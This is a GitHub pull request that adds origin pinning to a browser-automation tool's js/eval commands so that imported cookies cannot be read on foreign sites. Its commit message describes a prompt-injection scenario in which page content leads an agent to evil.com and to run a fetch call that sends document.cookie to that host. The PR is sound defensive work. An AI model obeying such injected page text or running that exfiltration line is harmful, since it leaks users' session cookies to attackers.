security: pin js/eval execution to cookie-imported origins#616
Open
halbert04 wants to merge 2 commits intogarrytan:mainfrom
Open
security: pin js/eval execution to cookie-imported origins#616halbert04 wants to merge 2 commits intogarrytan:mainfrom
halbert04 wants to merge 2 commits intogarrytan:mainfrom
Conversation
- Add cookie origin tracking to BrowserManager (trackCookieImportDomains, getCookieImportedDomains, hasCookieImports). Every cookie import path now records which domains were imported. - cookie-import-browser direct mode already required --domain; this adds --all as the explicit opt-in for importing all cookies. Without either flag, the interactive picker UI opens instead. - cookie-import (JSON file) now tracks imported domains on BrowserManager. - The --all flag works but emits a warning recommending --domain for tighter scoping. This is the foundation for origin-pinned JS execution (separate PR) — the BrowserManager now knows which domains have imported cookies, so downstream commands can restrict operations to those origins. Made-with: Cursor
When cookies have been imported (via cookie-import-browser or
cookie-import), the js and eval commands now verify that the current
page's hostname matches one of the imported cookie domains before
executing. If the agent navigates to an untrusted page while holding
imported cookies, JS execution is blocked with a clear error.
This prevents cross-origin cookie exfiltration attacks where:
1. Agent imports cookies for myapp.com
2. Prompt injection from page content instructs the agent to navigate
to evil.com
3. Agent runs `js document.cookie` or `js fetch('https://evil.com',
{body: document.cookie})` on the foreign origin
The check uses subdomain matching (e.g., importing .github.com allows
JS on api.github.com). When no cookies have been imported, JS/eval
work on any origin as before (no behavioral change for the common case).
Depends on the cookie origin tracking from the scoped-cookie-imports PR.
Made-with: Cursor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
jsandevalcommands now verify the current page's hostname matches an imported cookie domain before executing.github.comallows JS onapi.github.com)Depends on
Attack scenario this prevents
Changes
browse/src/read-commands.tsassertJsOriginAllowed()function, called beforejsandevalexecuteDesign decisions
.github.comallowsapi.github.com,gist.github.com, etc. This is consistent with how cookies scope to domains.about:blank,data:URIs pass through (no cookies at risk on these origins).Test plan
js document.titleworks normally when no cookies are importedcookie-import-browser chrome --domain .github.com,jsworks ongithub.comjsonexample.comthrows with clear erroreval /tmp/test.jsfollows the same origin check.github.com, JS allowed onapi.github.com)about:blankpages are allowed regardless of importsMade with Cursor